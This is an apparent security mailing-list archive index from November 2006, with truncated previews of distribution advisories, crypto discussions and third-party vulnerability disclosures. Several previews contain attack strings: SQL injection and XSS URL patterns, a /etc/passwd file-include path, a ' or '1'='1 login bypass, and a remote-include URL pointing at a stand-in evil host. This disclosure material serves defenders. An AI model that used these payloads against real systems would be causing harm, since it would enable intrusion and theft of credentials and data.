gNews Publisher SQL Injection Vulnerabilites

2006-11-21 Thread Advisory
Aria-Security's Research Team> # #Original Advisory at: #http://www.aria-security.com/forum/showthread.php?t=37 #- # #Software: gNews Publisher #Vendor: http://gazatem.com #Method: SQL Injection # #Poc: # #http://target/categories.asp?catID=[SQL Injection] #

Dovecot IMAP/POP3 server: Off-by-one buffer overflow

2006-11-21 Thread Timo Sirainen
Version: 1.0test53 .. 1.0.rc14 (ie. all 1.0alpha, 1.0beta and 1.0rc versions in the middle). 0.99.x versions are safe (they don't even have mmap_disable setting). Problem: When mmap_disable=yes setting is used (not default), dovecot.index.cache file is read to memory using "file cache" code. It c

aBitWhizzy [local file include]

2006-11-21 Thread saps . audit
vendor site: http://www.unverse.net/abitwhizzy/ product : aBitWhizzy bug:local file include global risk : high http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]

Re: [ GLSA 200611-11 ] TikiWiki: Multiple vulnerabilities

2006-11-21 Thread saps . audit
i've allready posted an advisory about that here: http://www.securityfocus.com/archive/1/450268 regards laurent gaffié http://s-a-p.ca/

Re: Serious crypto problem fixed by envelope HMAC method insteadof currently used prefix

2006-11-21 Thread Omirjan Batyrbaev
Hi, The problem/bug that I described below affects SSLv2 servers and clients. SSLv2 (still an option in the browsers) is vulnerable to this extension attack. Thanks. Regards, Omirjan Batyrbaev, CTO B3 Security Corp. [EMAIL PROTECTED] - Original Message - From: "Omirjan Batyrbaev" <[EMAIL

Secunia Research: My Firewall Plus Privilege Escalation Vulnerability

2006-11-21 Thread Secunia Research
== Secunia Research 21/11/2006 - My Firewall Plus Privilege Escalation Vulnerability - == Table of Contents Affected Software.

[ GLSA 200611-16 ] Texinfo: Buffer overflow

2006-11-21 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

dicshunary 0.1 alpha Remote File Inclusion Exploit

2006-11-21 Thread the_3dit0r
#!/usr/bin/perl # """ # """ :: ::: """ # """ :: :: :: : ::""" # """ :: :: : : """ # """:: :: ::: ::: :: :: :: :::: """ # """ :: :: :: : : : :

iPrimal Forums (index.php) Remote File Include Exploit

2006-11-21 Thread the_3dit0r
#!/usr/bin/perl # """ # """ :: ::: """ # """ :: :: :: : ::""" # """ :: :: : : """ # """:: :: ::: ::: :: :: :: :::: """ # """ :: :: :: : : : :

[SECURITY] [DSA 1217-1] New linux-ftpd packages fix access control bypass

2006-11-21 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1217-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 20th, 2006

[KAPDA]::Security analysis of cutenews 1.4.5

2006-11-21 Thread alireza hassani
Product: cutenews 1.4.5 Vendor: http://cutephp.com The Results through security analysis of cutenews 1.4.5 [provided by KAPDA.ir] -- Test plan: Manual penetration testing: YES Using automated tools: NO Code Auditing: YES Statistical Results

[ GLSA 200611-15 ] qmailAdmin: Buffer overflow

2006-11-21 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

New Correction: Re: Serious crypto problem fixed by envelope HMAC method instead of currently used prefix

2006-11-21 Thread Omirjan Batyrbaev
Hi, The problem/bug that I described below still affects SSLv2 servers and clients. SSLv2 (still an option in the browsers) is vulnerable to this extension attack. SSL v3 and TLS are not affected. Thanks. Regards, Omirjan Batyrbaev, CTO B3 Security Corp. [EMAIL PROTECTED] - Original Message -

Which is more secure? Oracle vs. Microsoft

2006-11-21 Thread David Litchfield
Hey all, What started out as a fun project for me turned out some serious results - "Which is more secure? Oracle vs Microsoft" is a paper I put together looking at the number of security flaws in the Oracle and MS database offerings. For those that are interested, you can grab a copy of the re

eClassifieds [injection sql]

2006-11-21 Thread saps . audit
vendor site: http://enthrallweb.com/ product : eClassifieds bug:injection sql risk : medium injection sql : /ad.asp?AD_ID='[sql] /ad.asp?cat_id='[sql] /dircat.asp?cid='[sql] /dirSub.asp?sid='[sql] /ad.asp?cat_id=35&sub_id='[sql] /ad.asp?cat_id=35&sub_id=102&ad_id='[sql] laurent gaffié & benjam

PhpQuickGallery <= 1.9 Remote File Inclusion Exploit

2006-11-21 Thread the_3dit0r
#!/usr/bin/perl # """ # """ :: ::: """ # """ :: :: :: : ::""" # """ :: :: : : """ # """:: :: ::: ::: :: :: :: :::: """ # """ :: :: :: : : : :

The Week of Oracle Database Bugs

2006-11-21 Thread Cesar
The Week of Oracle Database Bugs Based on the great idea of H D Moore "Month of Browser Bugs" and LMH "Month of Kernel Bugs", we are proud to announce that we are starting on December the "Week of Oracle Database Bugs" (WoODB). What is the WoODB about? An Oracle Database 0day will be released e

RE: FreeBSD all versions FireWire IOCTL kernel integer overflow information disclousure

2006-11-21 Thread Rogier Mulhuijzen
Is it me, or do you need to be root or a member of the operator group to be able to perform an IOCTL on /dev/fw*. In FreeBSD at least, /dev/fw* is only accessible by root (read/write) and members of the operator group (read-only). It might be a bug, I'll grant you that, but it's not disclosure to

Re: Correction: Re: Serious crypto problem fixed by envelope HMAC method insteadof currently used prefix

2006-11-21 Thread Steve Friedl
On Mon, Nov 20, 2006 at 01:45:45PM -0500, Omirjan Batyrbaev wrote: > This would have been a problem if the HMAC was just SHA-1(...) or MD5 (...) > or similar type of prefix HMAC. However, the HMAC used in TLS is more > involved construct (see RFC 2104) and the attack is not applicable. It is indee

Classified System [injection sql]

2006-11-21 Thread saps . audit
vendor site: http://www.vspin.net/ product :Classified System bug:injection sql risk : medium injection sql : /cat.asp?cat='[sql] /search.asp?in=y&keyword='[sql] /search.asp?in=y&keyword=1&submit=Search&order='[sql] /search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort='[sql] /se

ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability

2006-11-21 Thread ajannhwt
*** # Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability # Author : ajann # S.Page : http://www.aspnuke.com # D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470 **

Re: GPhotos 1.5 Multiple vulnerabilities

2006-11-21 Thread packet
This directory traversal has already been discovered. http://packetstormsecurity.org/0605-exploits/gphotos.txt f4e2552282a5007bb84e7693bc78dac2 GPhotos versions 1.5 and below suffer from directory traversal and cross site scripting flaws. Authored By Moroccan Security On Sat, Nov 18, 2006 a

my little weblog => Cross Site Scripting

2006-11-21 Thread the_3dit0r
""" """ :: ::: """ """ :: :: :: : ::""" """ :: :: : : """ """:: :: ::: ::: :: :: :: :::: """ """ :: :: :: : : : :: :: """ """

Re: [ MDKSA-2006:217 ] - Updated proftpd packages fix vulnerabilities

2006-11-21 Thread research
Hi, > > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > ___ > > Mandriva Linux Security Advisory MDKSA-2006:217 > http://www.mandriva.com/security/ >

[Full-disclosure] [ GLSA 200611-11 ] TikiWiki: Multiple vulnerabilities

2006-11-21 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

[SECURITY] [DSA 1215-1] New xine-lib packages fix execution of arbitrary code

2006-11-21 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1215-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 20th, 2006

Wabbit PHP Gallery => 0.9 Remote Traversal Directory

2006-11-21 Thread the_3dit0r
""" """ :: ::: """ """ :: :: :: : ::""" """ :: :: : : """ """:: :: ::: ::: :: :: :: :::: """ """ :: :: :: : : : :: :: """ """

mAlbum v0.3 Multiple vulnerabilitizzz

2006-11-21 Thread tux025
20/11/06 # Produit Vulnérable : mAlbum v0.3 # Site officiel du produit : http://satz.free.fr/ #Vulnérabilitiezz : 1] Multiple Full path disclosure : http://localhost/malbum/index.php?gal=";> 2]Directory traversal :http://localhost/malbum/index.php?gal=../../../ #Screen cap

Re: Re: Phpjobscheduler 3.0 - Multiple Remote File Include

2006-11-21 Thread admin
Indeed! It could offer a potential exploit. I have released a patched version here: http://www.dwalker.co.uk/forum/viewtopic.php?t=493 Firewall1954 (at) hotmail (dot) com - it is/would have been good practice to contact the developer (me) before publishing your find. If you had approached me wi

Digital Armaments November-Decemberr Hacking Challenge: KERNEL

2006-11-21 Thread info
Challenge pubblication is 11.02.2006 http://www.digitalarmaments.com/challenge200611849937.html I. Details Digital Armaments officially announce the launch of November-December hacking challenge. The challenge starts on November 1. For the November-December Challenge, Digital Armaments will g

[SECURITY] [DSA 1207-2] New phpmyadmin packages fix regression

2006-11-21 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1207-2[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 19th, 2006

Correction: Re: Serious crypto problem fixed by envelope HMAC method insteadof currently used prefix

2006-11-21 Thread Omirjan Batyrbaev
Hi, This would have been a problem if the HMAC was just SHA-1(...) or MD5 (...) or similar type of prefix HMAC. However, the HMAC used in TLS is more involved construct (see RFC 2104) and the attack is not applicable. - Original Message - From: "Omirjan Batyrbaev" <[EMAIL PROTECTED]> To:

Advisory: LDU <= 8.x Remote SQL Injection Vulnerability.

2006-11-21 Thread Mustafa Can Bjorn IPEKCI
--Security Report-- Advisory: LDU <= 8.x Remote SQL Injection Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 21/10/06 09:44 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: Neocrome (http://www.neocrome.net) Vers

[SECURITY] [DSA 1214-1] New gv packages fix arbitrary code execution

2006-11-21 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1214-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 20th, 2006

Serious crypto problem fixed by envelope HMAC method insteadof currently used prefix

2006-11-21 Thread Omirjan Batyrbaev
Hi, I propose to use envelope method instead of currently used prefix method in HMAC used in TLS/SSL. The measure is important especially since it was pointed out that the NULL cipher suites have a real use and since some ciphers are intentionally weak. With the NULL cipher (or the easily broken 4

Rialto 1.6[admin login bypass & multiples injections sql]

2006-11-21 Thread saps . audit
vendor site: http://www.grandora.com/ product : Rialto 1.6 bug:multiples injection sql , login bypass , xss risk : high ! admin login bypass : /admin/default.asp username:' or '1' = '1 passwd: ' or '1' = '1 injection sql : /listfull.asp?ID='[sql] /listmain.asp?cat='[sql] /printmain

MyAlbum <= 3.02 (langs_dir) Remote File Inclusion Exploit

2006-11-21 Thread the_3dit0r
#!/usr/bin/perl # """ # """ :: ::: """ # """ :: :: :: : ::""" # """ :: :: : : """ # """:: :: ::: ::: :: :: :: :::: """ # """ :: :: :: : : : :

Ixprim CMS 1.2 Remote File Include Vulnerability

2006-11-21 Thread vitux . manis
Aplication : Ixprim CMS 1.2 URL :http://optusnet.dl.sourceforge.net/sourceforge/ixprim/ixprim-1.2-200603171800.zip variable ixpts.class.php include_once( IXP_ROOT_PATH.'/kernel/class/files.class.php' ); Exploit : http://www.vuln.com/kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://evilsite

[SECURITY] [DSA 1216-1] New flexbackup packages fix denial of service

2006-11-21 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1216-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 20th, 2006

Telaen => 1.1.0 Remote File Include Vulnerability

2006-11-21 Thread the_3dit0r
""" """ :: ::: """ """ :: :: :: : ::""" """ :: :: : : """ """:: :: ::: ::: :: :: :: :::: """ """ :: :: :: : : : :: :: """ """

[ GLSA 200611-12 ] Ruby: Denial of Service vulnerability

2006-11-21 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

[SECURITY] [DSA 1213-1] New imagemagick packages fix several vulnerabilities

2006-11-21 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1213-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 19th, 2006

ehomes [multiples injections sql]

2006-11-21 Thread saps . audit
vendor site: http://enthrallweb.us/ product : ehomes bug:injection sql risk : medium injection sql : /dircat.asp?cid='[sql] /dirSub.asp?sid='[sql] /types.asp?TYPE_ID='[sql] /homeDetail.asp?AD_ID='[sql] /result.asp?city=1&cat='[sql] /compareHomes.asp?compare='[sql] /compareHomes.asp?compare=Compa

LoudMouth => 2.4 Remote File Include Vulnerabilities

2006-11-21 Thread the_3dit0r
""" """ :: ::: """ """ :: :: :: : ::""" """ :: :: : : """ """:: :: ::: ::: :: :: :: :::: """ """ :: :: :: : : : :: :: """ """

[ MDKSA-2006:215 ] - Updated avahi packages fix netlink vulnerability

2006-11-21 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:215 http://www.mandriva.com/security/ ___

BirdBlog => v1.4.0 Cross Site Scripting

2006-11-21 Thread the_3dit0r
""" """ :: ::: """ """ :: :: :: : ::""" """ :: :: : : """ """:: :: ::: ::: :: :: :: :::: """ """ :: :: :: : : : :: :: """ """

mxBB calsnails module 1.06 Remote File Inclusion Exploit

2006-11-21 Thread the_3dit0r
#!/usr/bin/perl # """ # """ :: ::: """ # """ :: :: :: : ::""" # """ :: :: : : """ # """:: :: ::: ::: :: :: :: :::: """ # """ :: :: :: : : : :

[ MDKSA-2006:217 ] - Updated proftpd packages fix vulnerabilities

2006-11-21 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:217 http://www.mandriva.com/security/ ___

LS-20061113 - CA BrightStor ARCserve Backup Remote Buffer Overflow Vulnerability

2006-11-21 Thread advisories
LS-20061113 LSsec has discovered a vulnerability in Computer Associates BrightStor ARCserve Backup v11.5, which could be exploited by an anonymous attacker in order to execute arbitrary code with SYSTEM privileges on an affected system. The flaw specifically exists within the Tape Engine (tapeeng

Link Exchange Lite [injection sql]

2006-11-21 Thread saps . audit
vendor site: http://softacid.net/ product:Link Exchange Lite bug: injection sql risk : high injection sql (post) : /search.asp post your sql query into the search engine field injection sql (get): /linkslist.asp?psearch='[sql] laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: [EMAIL

DodosMail <= 2.0.1(dodosmail.php) Remote File Inclusion Exploit

2006-11-21 Thread the_3dit0r
#!/usr/bin/perl # """ # """ :: ::: """ # """ :: :: :: : ::""" # """ :: :: : : """ # """:: :: ::: ::: :: :: :: :::: """ # """ :: :: :: : : : :

[ GLSA 200611-13 ] Avahi: "netlink" message vulnerability

2006-11-21 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

[ GLSA 200611-14 ] TORQUE: Insecure temproary file creation

2006-11-21 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

[SECURITY] [DSA 1218-1] New proftpd packages fix denial of service

2006-11-21 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1218-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 21st, 2006

klf-realty [injection sql]

2006-11-21 Thread saps . audit
vendor site:http://klf-design.com/ product :klf-realty bug:injection sql risk : medium injection sql : /search_listing.asp?category='[sql] /detail.asp?property_id='[sql] /search_listing.asp?agent='[sql] laurent gaffie & benjamin mosse http://s-a-p.ca/ contact: [EMAIL PROTECTED]

enomphp => 4.0 Remote Traversal Directory

2006-11-21 Thread the_3dit0r
""" """ :: ::: """ """ :: :: :: : ::""" """ :: :: : : """ """:: :: ::: ::: :: :: :: :::: """ """ :: :: :: : : : :: :: """ """

[USN-384-1] OpenLDAP vulnerability

2006-11-21 Thread Kees Cook
=== Ubuntu Security Notice USN-384-1 November 20, 2006 openldap2.2 vulnerability CVE-2006-5779 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6

Clarifying integer overflows vs. signedness errors

2006-11-21 Thread Steven M. Christey
A terminology question for people. In this reference: BUGTRAQ:20061115 Re: DragonFlyBSD all versions FireWire IOCTL kernel integer overflow information disclousure http://www.securityfocus.com/archive/1/archive/1/451677/100/0/threaded The issue is being described as an integer overflow. I

Re: [ GLSA 200611-11 ] TikiWiki: Multiple vulnerabilities

2006-11-21 Thread Chris Gianelloni
On Tue, 2006-11-21 at 15:38 +, [EMAIL PROTECTED] wrote: > i've allready posted an advisory about that here: > > http://www.securityfocus.com/archive/1/450268 > > > > regards laurent gaffi > http://s-a-p.ca/ > The GLSA is a notice to Gentoo users that the package in question had a vulnerab

Vulnerability in PostNuke

2006-11-21 Thread sni-labs
Error PostNuke in the variable stop which can be exploited by malicious people to disclose system information. Luckily the vulnerability affects to the 0.7.5.0 version and minors. POC: http://www.[web-with-PostNuke].com/user.php?stop=a (no numeric value) Example: http://www.dev-postnuke.com/us

[USN-381-1] Firefox vulnerabilities

2006-11-21 Thread Kees Cook
=== Ubuntu Security Notice USN-381-1 November 16, 2006 firefox vulnerabilities CVE-2006-5462, CVE-2006-5463, CVE-2006-5464, CVE-2006-5747, CVE-2006-5748 === A security issue af

PhpBB Module Dimension Remote File Include

2006-11-21 Thread bluespy . ok
=== =Bug was found in the part of phpBB = =Dork : "Powered by Dimension" = =Expl : includes/functions.php?phpbb_root_path= = =Source Code : http://www.xs4all.nl/~hkicken/plusxl20/phpbb2_plusxl_20_272.zip = =Found by : Ren

mg.applanix <= 1.3.1 Remote File Include Exploit

2006-11-21 Thread the_3dit0r
#!/usr/bin/perl # """ # """ :: ::: """ # """ :: :: :: : ::""" # """ :: :: : : """ # """:: :: ::: ::: :: :: :: :::: """ # """ :: :: :: : : : :

creadirectory [injection sql & xss]

2006-11-21 Thread saps . audit
vendor site: http://www.creascripts.com/ product:creadirectory bug: injection sql & xss risk : medium injection sql: /search.asp?search=1&submit=Search&category='[sql] xss: /addlisting.asp?cat=[xss] /search.asp?search=[xss] laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: [EMAIL PRO

ContentNow CMS 1.39 Sql Injection + Path Disclosure Vulnerabilities

2006-11-21 Thread revenge
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ContentNow CMS 1.39 'pageid' Sql Injection + Path Disclosure Severity : Medium Risk Vendor : http://www.contentnow.mf4k.de/ Author : Revenge [--] [#] Description ContentNow is a PHP Content Manage

The Classified Ad System [multiple xss & injection sql]

2006-11-21 Thread saps . audit
vendor site: http://www.rockfordarea.com/ product : The Classified Ad System bug: multiple xss (get) & injection sql risk : medium injection sql (get): /default.asp?action=view&main='[sql] injection sql (post) : just post your query into the search engine xss : /default.asp?action=view1&cat=[

[ MDKSA-2006:216 ] - Updated links packages fix smb vulnerability

2006-11-21 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:216 http://www.mandriva.com/security/ ___

ltwCalendar => 4.2.1 Remote File Include Vulnerabilities

2006-11-21 Thread the_3dit0r
""" """ :: ::: """ """ :: :: :: : ::""" """ :: :: : : """ """:: :: ::: ::: :: :: :: :::: """ """ :: :: :: : : : :: :: """ """

RE: [Reversemode advisory] Computer Associates HIPS Drivers - multiple local privilege escalation vulnerabilities.

2006-11-21 Thread Williams, James K
> -Original Message- > From: Reversemode [mailto:[EMAIL PROTECTED] > Sent: Thursday, November 16, 2006 11:15 AM > To: Securityfocus > Subject: [Reversemode advisory] Computer Associates HIPS > Drivers - multiple local privilege escalation vulnerabilities. > > > Computer Associates "Ho

JiRos Links Manager[injection sql & xss permanent]

2006-11-21 Thread saps . audit
vendor site:http://www.jiros.net/ product:JiRos Links Manager bug: injection sql & xss risk : medium injection sql: /openlink.asp?LinkID='[sql] /viewlinks.asp?CategoryID='[sql] xss permanent (post): in: /submitlink.asp -Link Name: -Link URL: -Link Image: -Link Description: those xss are reall

PHPOLL => 0.96 Cross Site Scripting

2006-11-21 Thread the_3dit0r
""" """ :: ::: """ """ :: :: :: : ::""" """ :: :: : : """ """:: :: ::: ::: :: :: :: :::: """ """ :: :: :: : : : :: :: """ """

VMSA-2006-0010 - SSL sessions not authenticated by VC Clients

2006-11-21 Thread VMware Security team
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 - - --- VMware Security Advisory Advisory ID: VMSA-2006-0010 Synopsis: SSL sessions not authenticated by VC Clients Patch URL:http://www.vmware.com/dow

[USN-382-1] Thunderbird vulnerabilities

2006-11-21 Thread Kees Cook
=== Ubuntu Security Notice USN-382-1 November 16, 2006 mozilla-thunderbird vulnerabilities CVE-2006-5462, CVE-2006-5463, CVE-2006-5464, CVE-2006-5747, CVE-2006-5748 === A secur

Shopping_Catalog Remote File Include exploit

2006-11-21 Thread the_3dit0r
#!/usr/bin/perl # # #Shopping_Catalog

Advisory: Seditio <= 1.10 Remote SQL Injection Vulnerability.

2006-11-21 Thread Mustafa Can Bjorn IPEKCI
--Security Report-- Advisory: Seditio <= 1.10 Remote SQL Injection Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 21/10/06 09:44 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: Neocrome (http://www.neocrome.net)

Rapid Classified v3.1 [multiple xss (get) & injection sql]

2006-11-21 Thread saps . audit
vendor site: http://www.4u2ges.com/ product : Rapid Classified v3.1 bug: multiple xss (get) & injection sql risk : medium injection sql : /viewad.asp?id='[sql] xss : /reply.asp?id=[xss] /view_print.asp?id=[xss] /search.asp?categoryName=1&SH1=[xss] /reply.asp?id=5012081548011&name=[xss] /advs